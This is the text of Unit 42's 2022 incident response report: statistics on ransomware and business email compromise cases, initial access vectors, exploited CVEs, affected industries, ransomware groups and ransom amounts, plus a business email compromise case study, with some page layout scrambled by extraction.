INCIDENT

RESPONSE
REPORT
2022
INCIDENT RESPONSE REPORT
2022
Executive Summary 5

Table of
How Incident Response Data Can
01 7
Help Prevent Bad Days

Contents 02 What Attackers Are Going After in 2022 9

Spotlight: Ransomware—
03 15
a Favorite Cash Cow for Cybercriminals

Spotlight: Business Email Compromise

04 22
—Under the Radar, But Costly

Spotlight: Cloud Incidents—

05 24
Low-Hanging Fruit for Threat Actors

Seven Issues Threat Actors

06 27
Don’t Want You to Address

What Threat Actors Do Once

07 29
They’re Inside a Network

08 Predictions: Follow the Money 32

If You Take Any Action to Protect

09 37
Your Organization, Start With These Six Things

Conclusion: Securing Your Organization

10 39
is a Journey, Not a Destination

Appendix: In-Depth Recommendations

40
to Help Secure Your Organization
Recommendations to Help Make Your Organization
40
as a Whole More Secure 

Recommendations to Prevent Phishing Attacks 43

Patching Recommendations to Keep Your

44
Organization’s Systems Up to Date

Recommendations to Secure Your Cloud Environment 44

Recommendations to Prevent Business Email Compromise 45

Methodology46

Unit 42 Incident Response Methodology 47

About Palo Alto Networks & Unit 42 48

Palo Alto Networks Prevent, Detect,

49
and Respond Capabilities

2
Foreword
When it comes to cybersecurity, if implemented appropriately, would
there is a risk to government, industry, serve to ensure governments have the
and individual citizens alike. The world’s visibility necessary to adequately respond
infrastructure, economy, and healthcare to incidents affecting critical services
are increasingly dependent on digital and infrastructure, and ensure industry
systems, making it even more critical partners can effectively collaborate to
to align strategies and resources to defend against these threats.
best mitigate the risks and threats we
are facing. In other cases, proposed rules would
enhance public disclosure of material
It is important to recognize that incidents by publicly traded companies,
cybersecurity is no longer the with a goal of ensuring boards and
responsibility of the few. It requires the company executives are appropriately
constant vigilance and efforts of everyone resourcing and implementing
throughout your organization. Because of cybersecurity policies and procedures
the far-reaching ripple effects an attack commensurate with that organization’s
can have across the digital ecosystem, risk. The ultimate goal would be to
we are seeing everyone, from boards improve an organization’s preparedness
to regulators, take a more active role, to withstand a cyberattack by ensuring
demanding greater transparency and executive-level oversight.
the continuous demonstration of an
organization’s preparedness to respond to In order to prepare, organizations must

the ever-evolving threat landscape. first understand what they are up against.
The “2022 Unit 42 Incident Response
A series of recent high-profile cyber Report” sheds light on the risks and
attacks has spurred governments threats that organizations are facing. It
across the globe to propose new laws provides insights into threat actors and
or regulations related to reporting their methods that can then be used to
significant cyber incidents, from the help organizations identify potential
United States to the European Union, gaps in their defenses and areas to focus
United Kingdom, Canada, Australia, India, on to improve their cybersecurity stance
and elsewhere. These requirements, going forward.

INCIDENT RESPONSE REPORT 2022 3

FOREWORD

This year, business email compromises recommendations that any organization

(BEC) and ransomware were the top can employ to strengthen its security
incident types Unit 42 handled. Both posture and mitigate the impact of
types of attacks are prevalent because an incident. Implementing these best
they generate fast, easy money for practices will go a long way toward making
criminal groups. Beyond lining an it harder and, therefore, less lucrative
attacker’s pockets, these breaches can and appealing for threat actors to attack.
be used to fund and inform subsequent Patching vulnerabilities, implementing
criminal acts, including those sponsored multifactor authentication and fixing
by nation-states. misconfigurations may not be exciting,
but these foundational steps reduce an
Ransomware in particular has been a
organization’s attack surface and ensure it
focus area for many in the cybersecurity
is not an easy target.
industry because of the impact on
targeted organizations and those who Once the basics are covered, organizations
depend on them. Ransomware threat can move to implement additional
actors gain control over critical data capabilities and defenses to address the
and resources and then leverage this more advanced hackers and tactics. The
control to coerce high-dollar payments goal is to make it as difficult and costly
from their victims. Unfortunately, these as possible for attackers to succeed at any
attacks have been made even easier with attack stage. It will take everyone being
the rise of ransomware-as-a-service vigilant and working tirelessly to protect
(RaaS) offerings. our connected, digital ecosystem, but
this effort is vital if we are to ensure that
Our job is to help break the cycle of
ecosystem is always there and functioning
illicit activity to protect the greater
to the benefit of us all.
digital ecosystem. This report outlines

Ciaran Martin
Founder and former CEO of the United Kingdom’s
National Cyber Security Centre

INCIDENT RESPONSE REPORT 2022 4

Executive Summary
Every week brings news about threat actors—new
campaigns, new groups, new types of attacks, new
targets. Defenders can easily wind up playing catchup,
but what does it take to flip the script?

70%
of incident response cases
SOC teams need to know where to
over the past twelve months were
focus defensive and network security ransomware and business email
efforts in a dynamic cyberthreat compromise (BEC).

landscape. CISOs need to understand the

77%
greatest security risks they face, and where
of intrusions are suspected to be
to prioritize scarce resources to reduce them. caused by three initial access vectors:
phishing, exploitation of known
Unit 42 has insights into hundreds of incident software vulnerabilities and brute-force
response cases, as well as global telemetry credential attacks—focused primarily
on remote desktop protocol (RDP).
and threat intelligence gathered at a large
scale, and we can use that to provide insights
into today’s cyberthreat landscape—and MORE THAN of positively identified vulnerabilities

87%
where it might be headed. fell into one of six major categories:
ProxyShell, Log4j, SonicWall,
Using a selection of over 600 incident ProxyLogon, Zoho ManageEngine
ADSelfService Plus and Fortinet.
response cases conducted over the past year,
we identified these key patterns and trends:

7
most targeted industries were
finance, professional and legal
services, manufacturing, healthcare,
high tech, and wholesale and retail.

50%
of targeted organizations
lacked multifactor authentication
on key internet-facing systems
such as corporate webmail, virtual
private network (VPN) solutions
and other remote access solutions.

INCIDENT RESPONSE REPORT 2022 5

EXECUTIVE SUMMARY

While there is no one-size-fits-all solution to protect your organization from

cyberattacks, CISOs, SOC leaders, incident responders, security analysts,
network defenders, and other professionals can use commonalities in our cases
to understand what attackers are going after and how they’ve been successful.
We accompany these insights with concrete recommendations on how to protect
your organization. This is our way of sharing lessons from the incident response
trenches to help bolster your security efforts.

We also asked our incident responders to look ahead to the cyberthreats

on the horizon. They shared the following predictions:

• The window of time to patch high-profile vulnerabilities before

exploitation will continue to shrink.

• The widespread availability attack frameworks and hacking-as-a-

service-based platforms will continue to increase in the number of
unskilled threat actors.

• Reduced anonymity and increased instability with cryptocurrency could

lead to a rise in business email compromise or payment card-related
website compromise.

• Declining economic conditions could push more people into cybercrime as

a way to make ends meet.

• Hacktivism and politically motivated attacks will increase as motivated

groups continue to hone their ability to leverage social media and
other platforms to organize and target both public and private sector
organizations seen as adversarial.

Alongside these predictions, we offer strategies for how you can get ahead of these
future threats today.

In the pages that follow, we identify the top methods attackers used to gain initial
access, as well as details on what led to the incident or allowed it to escalate.
We provide an in-depth spotlight on several key incident types—ransomware,
business email compromise, and cloud incidents. Finally, we share our top
actionable recommendations for securing organizations based on our experience
helping clients.

INCIDENT RESPONSE REPORT 2022 6

01
How Incident Response Data
Can Help Prevent Bad Days
Incident response services are there for you on a bad day. When
you need to use them, every second counts. At that moment,
you likely have a critical security incident to address and the top
priority is to contain and eradicate threats, recover, and restore
your organization’s ability to function as quickly as possible.

Reading about incident response can be a You don’t have to wait until a bad day to get that
totally different experience. advice. We’ve gathered our top insights from hundreds
of recent cases and are sharing them here along with
You can do this at a much calmer moment, gaining key tips for prevention and preparedness. You may still
insights from what’s gone wrong in the larger world so need to call on incident response services one day –
you know how to prepare your organization—and, we threat actors can be determined and innovative.
hope, successfully prevent some of those bad days.
Our hope is that if you do, you’ll have some
For any type of incident response, the key questions peace of mind even if you’re having a bad day
remain the same: What did they do? How did they as you make that call.
do it? Did they take anything? When our experts ask
those questions, we learn what we need to help an If you apply the top recommendations we share here,
individual client, and we build up a body of knowledge you’ll know that you’ve made a strong start toward
about how threat actors operate and how they gain preparing your organization for today’s threat
access to systems. landscape. You’ll have an understanding of your
organization’s security posture so that if you do need
Our incident responders say there are key pieces of to respond to a critical security incident, you’ll come at
advice they give to almost every client about how that effort with a foundation of confidence. You’ll know
to recover from an incident and close security gaps that you’ve taken steps to limit the damage threat
moving forward. actors can do within your systems and put measures in
place to ease the recovery process.

INCIDENT RESPONSE REPORT 2022 7

HOW INCIDENT RESPONSE DATA CAN HELP PREVENT BAD DAYS

How to Use This Report

If you’re a security leader: If you’re a security practitioner:

Use the data in this report to help determine where This report includes many practical recommendations
to focus your resources. Pay close attention to What based on our incident responders’ on-the-
Attackers Are Going After in 2022 and Predictions: ground experiences. Start with our team’s top
Follow the Money, and use these views of the current recommendations—a set that is tailor-made to help
and future threat landscape to help you strategize prevent and mitigate many types of incidents that
about where your organization most needs protection. organizations commonly face. You’ll find them in the
section titled, If You Take Any Action to Protect Your
Sharing the report with your Board could help start and
Organization, Start With These Six Things.
support conversations about the resources you need to
properly protect your organization and the potential Once you’ve laid the foundation, move to the more
impact of a breach. You may benefit from spotlights on in-depth recommendations that follow the conclusion.
specific challenges, including ransomware, business These are grouped based on the incident types they’re
email compromise and cloud incidents—especially designed to address so you can focus your efforts on
if these are areas of particular concern for you or the issues that matter most to you and your leadership.
your board. Consider sharing the report with your
It may also benefit you to look closely at the sections
direct reports and security teams, too, so they can
on threat actor behavior. Seven Issues Threat Actors
evaluate and implement recommendations in the
Don’t Want You to Address covers the seven security
areas you prioritize.
gaps that we most commonly observed threat actors
However you decide to steer your team, it’s worth using to their advantage. What Threat Actors Do Once
taking a look at our incident responders’ top They’re Inside a Network includes our observations
recommendations: If You Take Any Action to Protect of threat actors’ most commonly used capabilities
Your Organization, Start With These Six Things. We after initial access. Both these sections can translate
recommend ensuring that your organization has to practical guidance on where to shore up your
these fundamentals covered since they would help organization’s defenses.
prevent and mitigate many types of incidents that
Consider sharing the report with your peers and
organizations commonly face.
leadership to coordinate your defense efforts and
obtain buy-in on key approaches to protecting
your organization.

INCIDENT RESPONSE REPORT 2022 8

02
What Attackers Are
Going After in 2022
If you know what attackers are going after, you know what you
most need to protect. Here’s what we found in our case data
about the most common incident types, how attackers are
gaining initial access, what vulnerabilities they’re exploiting,
and which industries they’re targeting.

Attackers’ financial motivations drive Ransomware is a type of malware used

heavy use of ransomware and business by cybercriminals for financial gain.
email compromise. It is delivered in the same way any
type of malware makes its way onto
Incident Types targeted systems (e.g., through known

Ransomware and BEC were the top attacks we responded to over vulnerabilities, already compromised

the past 12 months, accounting for approximately 70% of our systems, social engineering tactics,
etc.). Once deployed, the ransomware
incident response cases.
will encrypt the organization’s files
While these two attacks are the primary ways threat actors and render them unusable to the
can monetize illicit access to networks, attackers have and organization. The attacker demands

use additional strategies for financial gain. Threat actors have ransom, promising to provide a

increasingly paired extortion with encryption (sometimes decrypter and not further disclose the
client’s data or identity in exchange.
including added threats of informing customers or the press,
or conducting a distributed denial-of-service attack). Some
attackers focus on extortion alone. For example, 4% of our cases Business Email Compromise (BEC) is
involved extortion without encryption—a technique distinct a category of threat activity involving
from ransomware that can be simpler to execute. In these cases, sophisticated scams which target
attackers coerce organizations into paying by threatening the legitimate business email accounts
release of customers’ data. through social engineering (e.g.,
phishing) or other computer intrusion
Our incident responders and threat intelligence analysts note activities. Once businesses are
that extortion without encryption is likely to rise. The efficacy compromised, cybercriminals leverage
of extortion tactics has even led some prominent threat actors their access to initiate or redirect
associated with the Conti ransomware group to publicly state the transfer of business funds for
that they envision focusing their future efforts on attacking personal gain.

organizations through extortion alone.

INCIDENT RESPONSE REPORT 2022 9

WHAT ATTACKERS ARE GOING AFTER IN 2022
Types of Investigations Conducted by Unit 42 in 2022

Ransomware Network Intrusion

36% 14%

Insider Threat
Business Email Compromise (BEC) 5%
34%

Extortion –
No Encryption
4% Exposure
Investigation
1%

PCI Investigation
1%
Other Types
<1%
Other Digital Web App
Forensics Compromise
2% 1%

Figure 1: Types of Investigations Conducted by Unit 42 in 2022

Attackers are looking for easy ways in. Remote Desktop Protocol (RDP) is

Suspected Means of Initial Access a protocol on Microsoft Windows

systems that is designed to allow
The top three access vectors for threat actors were phishing,
users to connect to and control a
exploitation of known software vulnerabilities and brute-force remote system. Common legitimate
credential attacks—focused primarily on remote desktop protocol uses include allowing IT support to
(RDP). These three attack vectors totaled over 77% of the suspected remotely control a user’s system to
root causes for intrusions. Of note, the next most commonly fix an issue, allowing access to virtual
used means of access for threat actors was leveraging previously machines in cloud environments
compromised credentials. and remotely managing cloud assets.
Unfortunately, it is easy to expose
RDP unintentionally, which has led to
it becoming a popular initial attack
vector among threat actors.

INCIDENT RESPONSE REPORT 2022 10

WHAT ATTACKERS ARE GOING AFTER IN 2022
Suspected Means of Initial Access

How do organizations
find out they’ve
Software
Vulnerabilities been compromised?
31%
Brute-force
Credential
Often, organizations notice an alert or
Attacks
9% find software that shouldn’t be installed,
signaling that something odd is going on
in the network.
Previously
6% Compromised
Credentials Other times, the threat actor reveals their

5% presence by popping up with a ransom

Insider Threat note.
5%
Phishing 4% Social Engineering Sometimes, it gets stranger than that.
37% 3% In one case, a threat actor compromised

Abuse of Trusted a series of identification photos and

Relationship(s) / Tool(s)
other sensitive scanned documents,

Others then stitched the images into a mosaic

depicting a famous character related
to the threat actor’s moniker as proof
of exfiltration.
Figure 2: Suspected Means of Initial Access

Exploited Vulnerabilities in Unit 42 Cases

A few key vulnerabilities have

become attackers’ favorites.
Exploited Vulnerabilities Other
Vulnerabilities
13%
For cases where responders positively identified the FortiNet CVEs

vulnerability exploited by the threat actor, more Zoho ManageEngine 3%

ADSelfService Plus
4%
than 87% of them fell into one of six CVE categories. ProxyLogon
5%
The primary categories are and their corresponding
SonicWall
CVEs, where available, are: CVEs ProxyShell
7% 55%
• ProxyShell (CVE-2021-34473, CVE-2021-
34523, CVE-2021-31207)
• Log4j Log4j
14%
• SonicWall CVEs
• ProxyLogon (CVE-2021-26855, CVE-2021-
26857, CVE-2021-26858, CVE-2021-27065)
• Zoho ManageEngine ADSelfService Plus
(CVE-2021-40539)
• Fortinet CVEs
Figure 3: Exploited Vulnerabilities in Unit 42 Cases

INCIDENT RESPONSE REPORT 2022 11

WHAT ATTACKERS ARE GOING AFTER IN 2022

Log4Shell
On Dec. 9, 2021, a zero-day remote code immediately following public knowledge of the
execution (RCE) vulnerability in Apache Log4j vulnerability (Dec. 12-16), spikes of hits continued
2 was identified as being exploited in the wild. to take place throughout that entire period.
Public proof-of-concept (PoC) code was released
When we investigated what would have
and subsequent investigation revealed that
happened had the hits on our Threat Prevention
exploitation was incredibly easy to perform. What
signature been successful, we observed a wide
followed was a series of events that will go down
range of attempted activities: vulnerable server
in cybersecurity history.
identification via mass scanning, the installation
RCE vulnerabilities are often high severity of backdoors to exfiltrate sensitive information
because they allow an attacker to execute and to install additional tools, the installation
malicious code on a system, but this vulnerability of coin mining software for financial gain and
had a particularly far-reaching impact. Log4Shell many more.
was rated a 10 on the Common Vulnerability
Before long, incident response cases also began
Scoring System (CVSS)—the highest possible
to appear. Log4j accounts for 14% of cases where
score. And while Apache Log4j 2 may not have
responders positively identified the vulnerability
been a household name outside the technical
exploited by the threat actor—despite only being
community, the software underlies a large
public for a few months of the time
number of well-known services and systems.
period we studied.
Organizations all over the globe had
vulnerable systems (whether or not they
knew it), and mass scanning activities
seeking these vulnerable systems began “Log4Shell is not the first
almost immediately. vulnerability garnering
Unit 42 researchers monitored hits on significant public interest,
the Apache Log4j Remote Code Execution and it almost certainly won’t
Vulnerability Threat Prevention
be the last. That’s why it’s important to
signature, which allowed us to gain
visibility into exploitation attempts. look at Log4Shell both as a standalone
Between Dec. 10, 2021, and Feb. 2, 2022, vulnerability that demands discrete analysis
we observed almost 126 million hits
and reflection, and as the latest in a string
triggering the signature. While the
largest number of hits occurred in days
of national-level vulnerabilities that impact
federal systems, critical infrastructure, and
state and local networks alike.”

Jen Miller-Osborn, Unit 42 Deputy Director of Threat Intelligence

Written testimony submitted to the Homeland Security and
Governmental Affairs Committee of the U.S. Senate

INCIDENT RESPONSE REPORT 2022 12

WHAT ATTACKERS ARE GOING AFTER IN 2022

Zoho Manage Engine AD SelfService Plus

On Sept. 16, 2021, the U.S. Cybersecurity and as TiltedTemple). The actor continued to conduct
Infrastructure Security Agency (CISA) released an alert reconnaissance against these industries and others,
warning that advanced persistent threat (APT) actors including infrastructure associated with five U.S. states.
were actively exploiting newly identified vulnerabilities
Our threat intelligence analysts believe that the actor’s
in a self-service password management and single
primary goal involved gaining persistent access to the
sign-on solution known as Zoho ManageEngine
network and the gathering and exfiltration of sensitive
ADSelfService Plus.
documents from compromised organizations.
Building upon the findings of that initial report, on Nov.
While the vulnerability in Zoho ManageEngine
7, Unit 42 disclosed a second, more sophisticated, active
ADSelfService Plus accounts for only 4% of cases where
and difficult-to-detect campaign that had resulted in
responders positively identified the vulnerability
the compromise of at least nine organizations.
exploited by the threat actor, the TiltedTemple
By Dec. 2, the number of targets had grown to 13 campaign illustrates how a determined threat actor
across the technology, defense, healthcare, energy, can use a vulnerability as a doorway to extensive
finance and education industries, and we had identified malicious activity.
patterns consistent with a persistent campaign (tracked

Attackers follow the money when targeting industries.

Industries Affected: Cases by Industry

The top affected industries were finance, professional and legal services,
manufacturing, healthcare, high tech, and wholesale and retail. These
industries accounted for over 60% of our cases. Organizations within these
industries store, transmit and process high volumes of monetizable sensitive
information that attracts threat actors.

Attackers may at times purposely target certain industries—for example,

financial organizations because they frequently conduct wire transfers, or
healthcare organizations because they may be particularly motivated to avoid
operational disruptions. However, many attackers are opportunistic, simply
scanning the internet in search of systems where they might leverage specific
vulnerabilities. In some cases, industries may have been particularly affected
not because attackers intended to target them but because, for example,
organizations in those industries happen to make widespread use of certain
software with known vulnerabilities.

INCIDENT RESPONSE REPORT 2022 13

 Top
WHAT ATTACKERS ARE GOING AFTER INAffected
2022 Industries in 2022

Finance

Professional &
Legal Services

Manufacturing

Healthcare

High Technology

Wholesale
& Retail

Education

Hospitality

0 10 20 30 40 50 60 70 80 90

RECORD COUNT

Figure 4: Top Affected Industries in 2022

But not all motivations are financial.

Grudges matter, too. Key Insight: Insider threats often
Insider Threats involve theft of intellectual property.
Insider threats were not the most common type Our incident responders report many ways this can
of incident we handled—5.4%—but they can be happen, including:
significant because they involve a malicious actor
• Transferring data to personal accounts (especially
who knows exactly where to look to find sensitive possible when remote work allows an employee to
data. Seventy-five percent of our insider threat cases simply shut off a VPN).
pertained to a disgruntled ex-employee who left with
• Physically transporting corporate property to a
company data, destroyed company data, or accessed competitor’s location.
company networks after their departure.
• Using inside knowledge to locate and hire the same
However, our consultants note that many attacks that contractors and support staff, who then may have
access to privileged information.
appear initially to be insider threats turn out to come
from cybercriminals who, for instance, purchased
stolen credentials. With mature markets for illicit
initial access available, differentiating between
legitimate user access and malicious user access is
75%
becoming more challenging. of insider threat cases were caused by a
disgruntled ex-employee with enough sensitive
data to become a malicious threat actor.

INCIDENT RESPONSE REPORT 2022 14

03
Spotlight:
Ransomware
A FAVORITE CASH COW
FOR CYBERCRIMINALS

Ransomware has grabbed attention in recent years. Multi-extortion techniques, including

It sometimes seems as if every week brings new high-profile double extortion, occur when attackers
not only encrypt the files of an
headlines about multimillion dollar demands from threat
organization, but also name and shame
actors. The choice of targets has at times been disturbing,
the targets and/or threaten to launch
including hospitals and other organizations that people
additional attacks (e.g., distributed
depend on for the needs of daily life.
denial of service, known as DDoS) to

Ransomware can disrupt daily operations, causing encourage organizations to pay more
quickly. Many ransomware groups
significant headaches and financial pressure. Increasingly,
maintain dark web leak sites for the
affected organizations can also expect threat actors to use
purpose of double extortion.
double extortion, threatening to publicly release sensitive
information if a ransom isn’t paid.
Ransomware as a service (RaaS) is a
Cybercriminals have displayed innovation on the one
business for criminals, by criminals,
hand—introducing sophisticated attack tools, extortion with agreements that set the terms for
techniques, and marketing campaigns. On the other hand, providing ransomware to affiliates,
the RaaS business model has lowered the technical bar for often in exchange for monthly fees or
entry by making powerful tools accessible to wannabe cyber a percentage of ransoms paid. RaaS
extortionists with easy-to-use interfaces and online support. makes carrying out attacks that much
easier, lowering the barrier to entry for
What follows is a set of observations from our case data would-be threat actors and expanding
that highlight the impact that ransomware has had on the reach of ransomware. Unit 42 is
various industries. actively tracking at least 56 active
RaaS groups, some of which have been
operating since 2020. Due to the success
of these groups, we expect activity of
this type to continue to grow.

INCIDENT RESPONSE REPORT 2022 15

SPOTLIGHT: RANSOMWARE—A FAVORITE CASH COW FOR CYBERCRIMINALS

Case Study: LockBit 2.0 Ransomware

LockBit 2.0 is a rebrand of LockBit ransomware and has become one of the
most common ransomware variants that organizations are facing this year.

LockBit 2.0 is offered as ransomware about more than 850 compromised

as a service (RaaS), but represents a organizations. The site itself typically
departure from the usual RaaS storyline. features information such as victim
While in many cases, RaaS appeals to domains, a time tracker and measures of
less technically savvy threat actors, how much data was compromised.
LockBit 2.0 operators allegedly only work
LockBit 2.0 has been observed changing
with experienced penetration testers,
infected computers’ backgrounds to a
especially those experienced with tools
ransom note, which not only demands
such as Metasploit and Cobalt Strike.
payment but also attempts to recruit
This can make it more challenging for
insiders from targeted organizations.
organizations to defend against the
Notes that we’ve observed claimed that
variant. Affiliates are tasked with gaining
threat actors would pay “millions of
initial access to the targeted network,
dollars” to insiders who provided access
allowing LockBit 2.0 to conduct the rest
to corporate networks or facilitated
of the attack.
a ransomware infection by opening
LockBit 2.0 is also known for its extensive a phishing email and/or launching a
use of double- and multi-extortion payload manually. The threat actors
techniques. The group maintains a leak also expressed interest in other access
site – a website located on the dark methods such as RDP, VPN and corporate
web where names and details about email credentials. In exchange, they offer
compromised organizations are posted a cut of the paid ransom.
and shared in order to increase the
These tactics underscore how
pressure to pay a ransom. In addition,
organizations must prepare to defend
LockBit 2.0 operators have been known
against evolving business models being
to perform distributed denial-of-service
used by threat actors. LockBit 2.0 is not
(DDoS) attacks against compromised
simply aiming to encrypt data and halt
organizations’ infrastructure to raise the
business operations; the group also aims
volume even higher—a technique known
to do reputational harm and to encourage
as triple extortion.
insider threats. Defense against this type
As of May 25, 2022, LockBit 2.0 accounted of ransomware requires a comprehensive
for 46% of all ransomware-related awareness of possible attack vectors
breach events shared on leak sites in and a strong incident response plan for
2022. The LockBit 2.0 RaaS leak site mitigating damage after an initial breach.
has published names and information

INCIDENT RESPONSE REPORT 2022 16

SPOTLIGHT: RANSOMWARE—A FAVORITE CASH COW FOR CYBERCRIMINALS
Ransomware - Suspected Means of Initial Access

Ransomware: Initial Access

Ransomware threat actors appear to
favor different means of initial access
than we saw in our overall statistics. For Other

ransomware, the suspected means of initial

access for 48% of our cases came from 4% Software
Abuse of Trusted Vulnerabilities
Relationship(s) / Tool(s)
software vulnerabilities. This is followed 48%
8%
by brute-force credential attacks at 20%,
phishing at 12%, and both previously Previously
Compromised
8%
compromised credentials and abuse of Credentials

trusted relationships or tools at 8%.

The heavy use of software vulnerabilities Phishing

12%
matches the opportunistic behavior we
often see from ransomware actors. They Brute-force
Credential Attacks
typically scan the internet at scale for
20%
vulnerabilities and weak points where
they can focus. This approach and brute-
force credential attacks (typically focused
Figure 5: Ransomware – Suspected Means of Initial Access
on RDP) can get them the majority
of their business.

Ransom Demands and Payments

We have seen ransom demands as high as $30 million “Threat actors will find
over the past year, and we have seen instances of
a way into a network
clients paying ransoms over $8 million.
if they want to.”
Threat actors increasingly mention cyber insurance
during ransomware negotiations as a reason why a Jessica Ho, Unit 42 Principal Consultant

victim organization can afford to pay a ransom. This

is sometimes just a negotiation tactic, as we have
observed this even with clients who are uninsured. Even so,
threat actors do attempt to access financial information when
they have unauthorized access to a
victim organization and calculate ransom demands based on
the (perceived) revenue of the organization being extorted.

News reports often include other examples of large ransom

demands or payments.

INCIDENT RESPONSE REPORT 2022 17

SPOTLIGHT: RANSOMWARE—A FAVORITE CASH COW FOR CYBERCRIMINALS

Average Ransom Demand by Industry

Ransom Demands
and Payments by Industry
Finance $7.96M

When we break our case data by industry,

we find the averages and medians shown in Real Estate $5.20M

Figures 6 and 7. (Note: The median payments

Wholesale $3.05M
& Retail
shown in Figure 7 are calculated using
only cases where a ransom was paid and do High Tech $2.52M
not directly relate to the average amount
demanded shown in Figure 6.) Construction $2.02M

Manufacturing $1.63M

Key Insight: Ransomware Transportation $1.53M

& Logistics
attacks can happen fast.
Hospitality $1.47M
The median dwell time we observed
for ransomware attacks – meaning the Healthcare $1.41M
time threat actors spend in a targeted
environment before being detected, Education $0.69M

was 28 days. Our security consultants

Professional & $0.63M
say that clients most often learn about When Ransom is Paid:
Legal Services

Median Reduction from Initial

ransomware attacks the hard way— $0 Demand
$1M by
$2MIndustry
$3M $4M $5M $6M $7M $8M

when they receive a ransom note.

$2M
Figure 6: Average Ransom Demand by Industry

$1.5M

$1M

-60%

$0.5M
-74% -70%
-62%

-53% -51%
-85%

$0
High Manufacturing Transportation Wholesale Healthcare Professional &
& Logistics & Retail Finance Legal Services
Technology

MEDIAN RANSOM PAID MEDIAN RANSOM DEMAND

Figure 7: When Ransom is Paid: Median Reduction from Initial Demand by Industry

INCIDENT RESPONSE REPORT 2022 18

SPOTLIGHT: RANSOMWARE—A FAVORITE CASH COW FOR CYBERCRIMINALS

Most Active Ransomware Groups

Among the cases our incident response consultants handled, certain
ransomware groups stood out as particularly active. Ransomware groups
Unit 42 regularly releases freely
are often known for using particular tactics, techniques, and procedures
available overviews of active
(TTPs), so knowing which groups are most active and dangerous can help
ransomware groups, including
your security teams determine where to focus your defense. Be aware, TTPs and advice for how to
however, that new ransomware groups start up regularly, and existing defend against them.
groups often rebrand for a variety of reasons, including to shift their
Most Active Ransomware Variants in 2022 - Read our assessments of:
approach or to avoid attention
Unit from law enforcement.
42 Incident Response Data
• Conti

• LockBit 2.0

• Phobos
Conti 22%
• Dharma

LockBit / LockBit 2.0 14% • REvil

• BlackCat
Hive 8%
Sign up for notifications on new
Dharma 7% research about ransomware
groups and other threats.
PYSA 7%

Phobos 7%
For an in-depth ransomware
update and overview of
ALPHV / BlackCat 6%
ransomware threat actors
REvil 5% and their TTPs, refer to the
2022 Unit 42 Ransomware
BlackMatter 5% Threat Report 2022 or our
corresponding webinar.
Other Variants 18%

Figure 8: Top Confirmed Ransomware Actors Observed in Unit 42 Cases

INCIDENT RESPONSE REPORT 2022 19

SPOTLIGHT: RANSOMWARE—A FAVORITE CASH COW FOR CYBERCRIMINALS
Industries Affected by Ransomware vs Ransomware Groups

LockBit / LockBit /
LockBit 2.0 LockBit 2.0

Conti Conti

Hive Hive

BlackCat BlackCat

PYSA PYSA

Dharma Dharma

REvil REvil
BlackMatter BlackMatter
Phobos Phobos

Professional & Legal Services Healthcare

LockBit / LockBit /
LockBit 2.0 LockBit 2.0

Conti Conti

Hive Hive

BlackCat BlackCat

PYSA PYSA

Dharma Dharma

REvil REvil
BlackMatter BlackMatter
Phobos Phobos

Manufacturing Education

LockBit / LockBit /
LockBit 2.0 LockBit 2.0

Conti Conti

Hive Hive

BlackCat BlackCat

PYSA PYSA

Dharma Dharma

REvil REvil
BlackMatter BlackMatter
Phobos Phobos

High Technology Hospitality

Figure 9A: Industries Affected by Ransomware vs Ransomware Groups

INCIDENT RESPONSE REPORT 2022 20

SPOTLIGHT: RANSOMWARE—A FAVORITE CASH COW FOR CYBERCRIMINALS
Industries Affected by Ransomware vs Ransomware Groups

LockBit / LockBit /
LockBit 2.0 LockBit 2.0

Conti Conti

Hive Hive

BlackCat BlackCat

PYSA PYSA

Dharma Dharma

REvil REvil
BlackMatter BlackMatter
Phobos Phobos

Wholesale & Retail Finance & Insurance

LockBit / LockBit /
LockBit 2.0 LockBit 2.0

Conti Conti

Hive Hive

BlackCat BlackCat

PYSA PYSA

Dharma Dharma

REvil REvil
BlackMatter BlackMatter
Phobos Phobos

Construction Transportation & Logistics

LockBit / LockBit /
LockBit 2.0 LockBit 2.0

Conti Conti

Hive Hive

BlackCat BlackCat

PYSA PYSA

Dharma Dharma

REvil REvil
BlackMatter BlackMatter
Phobos Phobos

Real Estate State & Local Government

Figure 9B: Industries Affected by Ransomware vs Ransomware Groups

INCIDENT RESPONSE REPORT 2022 21

04
Spotlight:
Business Email Compromise
UNDER THE RADAR, BUT COSTLY

Case Study
It was a typical day for our client, an executive with a U.S.
financial services firm that relies on a widely used MFA
mobile app to protect access to email, customer files, and Key Business Email Compromise Data
other sensitive data. His iPhone kept pinging him with Points From Unit 42 Investigations
MFA requests to access his email, interrupting him on a
day packed with customer meetings. He was annoyed by
the intrusion, figuring it was some kind of system error,
7-48 DAYS
Typical Dwell Time Prior to
and rejected each request so he could focus on work.
Containment
He thought it was over when the requests stopped. Months

38 DAYS
later, however, he learned he had fallen for an MFA fatigue
attack. He had mistakenly authorized one of those many
requests, unknowingly granting an attacker unfettered Median Dwell Time
access to his email. He learned about the compromise
when his bank flagged suspicious wire transfers totaling
nearly $1 million. Our investigation uncovered the
exposure of data belonging to the company, its employees,
$286,000
and clients.
Average Amount of
Successful Wire Fraud
Fortunately, the company was able to recover the stolen
funds, but attacks of this nature can still be costly in terms
of reputation—as well as the time and resources spent
cleaning up after them.

For more examples of BEC from Unit 42 case files, refer

to our blog, "Nightmare Email Attacks (and Tips for
Blocking Them)."

INCIDENT RESPONSE REPORT 2022 22

SPOTLIGHT: BUSINESS EMAIL COMPROMISE—UNDER THE RADAR, BUT COSTLY

While ransomware attacks tend to dominate the headlines,

cybercriminals continue to compromise business emails for financial
gain. The U.S. Federal Bureau of Investigation calls BEC the “$43 billion
scam,” referring to statistics for incidents reported to the Internet Crime
Complaint Center from 2016-2021.

Techniques for business email compromise can vary. Some threat groups
gain access to targeted accounts through brute-force credential attacks,
for example. However, social engineering, including phishing, is often an
easy and cost-effective way to gain clandestine access while maintaining
a low risk of discovery.

In many cases, cybercriminals are simply asking their unwitting targets

to hand over their credentials—and getting them.

SilverTerrier
Over the past half decade, Unit 42 has actively monitored the evolution of
business email compromise with a unique focus on threat actors based in
Nigeria, which we track under the name “SilverTerrier.”

While BEC is a global threat, our focus on Nigerian actors provides insights
into one of the largest subcultures of this activity, given the country’s
consistent ranking as one of the top hotspots for cybercrime. We have
compiled one of the most comprehensive data sets across the cybersecurity
industry, with over 170,700 samples of malware from over 2.26 million
phishing attacks, linked to roughly 540 distinct clusters of BEC activity.

This telemetry enables Unit 42 researchers to proactively share intelligence

on cybercriminals with law enforcement agencies. We were recently able
to assist with investigations and operations led by INTERPOL, resulting in
several high-profile BEC actors being arrested in Operation Falcon II and
Operation Delilah.

INCIDENT RESPONSE REPORT 2022 23

05
